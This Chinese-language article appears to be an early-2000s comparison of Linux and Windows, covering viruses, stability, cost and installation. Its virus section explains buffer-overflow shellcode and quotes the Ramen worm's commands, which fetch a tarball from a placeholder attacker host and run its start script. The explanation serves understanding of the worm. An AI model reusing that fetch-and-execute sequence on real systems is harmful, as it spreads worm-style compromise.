Linux是自由軟件,而自由軟件和非自由軟的區別在於: 1. 自由軟件是開放的,成千上萬的人可以檢查這個軟件,快速地找到並修改其錯誤碼。 2. 最終用戶可以按照自己的意願自定義自由軟件,有特殊需要的用戶也可以完全按照他們認為合適的方式定制自己的Linux。
Linux是自由軟件,而自由軟件和非自由軟的區別在於:
1. 自由軟件是開放的,成千上萬的人可以檢查這個軟件,快速地找到並修改其錯誤碼。
2. 最終用戶可以按照自己的意願自定義自由軟件,有特殊需要的用戶也可以完全按照他們認為合適的方式定制自己的Linux。
3. 自由軟件為了防止重復發明,通過共享源代碼和思想來節省很多工作量。
以上這些特性是不是對有想法的好事者有莫大的吸引力?不僅如此,Linux由於自身的優點,應用領域也越來越廣泛。如最近嵌入式Linux的應用相當熱門,已廣泛應用於包括筆記本電腦、連網裝置、
網絡電視等在內的各式各樣的通信基礎產品,而
嵌入式操作系統正日益成為一種勢不可擋的流行趨勢,最終電腦、通訊、家電會因為它的存在而成為一體。這些也為有想法的好事者提供了更廣闊的發揮空間。在夢想就是力量的今天,沒有了創新能力是不可想象的。 如果你總是使用微軟的
開發工具,你一生只能做個操作人員。 。這一篇,
LINUX占了上風
(九)防病毒篇 1998年的CIH病毒讓全世界人民為之膽怯,隨之而來的基於OUTLOOK傳播美莉莎,歡樂時光等病毒更是是IT行業以及相關領域損失慘重。。而LINUX方面關於世界上第一個Linux病毒——reman已經出現的說法,我們得到該病毒的有關資料和樣本之後發現,嚴格地說,reman並不能被稱為病毒。實際上這是一個古老的,在NIX/Linux世界早已存在的“緩沖區溢出”攻擊程序。幾乎所有
UNIX/Linux版本中都或多或少地存在這樣的問題。第一次此種類型的攻擊(morris worm),到現在已經十多年了,並不是等到現在才“出現”的。事實上針對
windows 98/NT的緩沖區溢出攻擊也是很常見的。
緩沖區溢出的原理是:向一個有限空間的緩沖區拷貝了過長的字符串,覆蓋相鄰的存儲單元,會引起程序運行失敗。因為自動變量保存在堆棧當中,當發生緩沖區溢出的時候,存儲在堆棧中的函數反回地址也會被覆蓋從而無法從發生溢出的函數正常返回(返回地址往往是一個無效的地址),在這樣的情況下系統一般報告:“core dump”或“segment fault”。嚴重的是:如果覆蓋緩沖區的是一段精心設計的機器指令序列,它可能通過溢出,改變返回地址,將其指向自己的指令序列,從而改變該程序的正常流程。這段精心設計的指令一般的目的是:“/bin/sh”,所以這段代碼被稱為:“shell code”。通過這樣的溢出可以得到一個shell,僅此而已。但是,如果被溢出是一個suid root程序,得到的將是一個root shell。這樣機器的控制權已經易手,此後發生的任何事情都是合理的。
下面我們回到reman。它首先對網絡上的主機進行掃描,通過兩個普通的漏洞進入系統,獲取root權限,然後從源主機復制自身,以繼續掃描網上其他
服務器。對於Red Hat 6.2來講,如果攻擊成功,它會做以下工作:
mkdir /usr/src/.poop;cd /usr/src/.poop
export TERM=vt100
lynx -source http://FROMADDR:27374 > /usr/src/.poop/rame.tgz
cp ramen.tgz /tmp
gzip -d ramen.tgz;tar -xvf ramen.tar;./start.sh
echo Eat Your Ramen! | mail -s TOADDR -c
[email protected] [email protected] 很明顯,reman只是一個自動化了的緩沖區溢出程序,而且是很普通的一種。目前緩沖區溢出攻擊是非常普遍的一種攻擊,黑客網站對各類系統的漏洞的發布幾乎每日更新。但是這種攻擊方式並不是不可避免,目前已有很多對付該類攻擊的方案。這一篇,LINUX占了上風。
(十)穩定能力篇 運行Linux的機器啟動一次可以運行數月。Linux提供了完全的內存保護,每個進程都運行在自己的虛擬地址空間中,並且不會損壞其他進程或內核使用的地址空間。任務與內核間也是相互隔離,即行為不良或編寫不良的程序只能毀壞自己。因此被破壞的進程幾乎不可能使系統崩潰。Linux在和
Windows98和NT在
安全性的較量中占有上風,和Windows2000的情況又怎麼樣呢?資深的系統安全分析家指出:Windows 2000在網絡系統,服務器連接方面的工作准備不足,Linux仍然是目前最安全的操作系統。資深的系統安全分析家還預計到今年年底Windows 2000才能完成
測試、除蟲工作,而微軟的WONDOWS
XP推出不久,筆者不敢多家評論。目前比較安全的操作系統仍然是商業版本的UNIX和Linux。資深的系統安全分析家肯定地認為:在未來的5年裡,Linux將成為最安全的操作系統。到2005年,管理和使用Linux將是一件十分容易的事情。LINUX在本篇占了上風。
(十一)購買能力篇 這是一個不容回避的問題。因為價格原因,每個人都可以擁有正版的Linux。此外除了技術上的原因,它更大的意義是代表了一種開放性的軟件開發及開放模式,並徹底打破了越優秀的軟件價格越高這一傳統定式Linux還是一個完全開放的系統。它支持各種像POSIX標准這樣的開放標准和TCP/IP的Inte
.net工程任務組標准。由於避免了專有的API(應用程序接口)和協議,可以減少對單一供應商的依賴。這樣就不會出現像使用專用系統的情況:一旦犯了錯誤,只能繼續使用原來的系統供用商的產品。也就是不會出現先享受低價,而在後期需要付出高額服務費的情況。本篇中LINUX占了上風。
(十二)安裝難易篇 早期的LINUX安裝復雜對於新手更要冒丟失數據的風險。不過隨著內核升級到2.4後各個主要LINUX軟件提供商的產品安裝已經變得簡單。不過和微軟件安裝相比,Linux占了下風
(十三)總結篇 開放源代碼是大勢所趨,Linux前途廣闊,但道路是艱苦卓絕。微軟在IT業不景氣的情況下,仍然保持著兩位數增長。而一些LINUX廠商(如VI LINUX)出現大幅虧損。。還有一個問題現在一些LINUX廠商熱衷於把Linux的X
WINDOWS做的很好媒體也大加宣傳,Linux的優勢在於網絡,嵌入式信息家電.和微軟拼桌面是不明智的。微軟是一個整體,Linux廠商要防止被各個擊破。我喜歡Linux但我也不想看到微軟倒下,只有競爭才能是消費者得到好處。
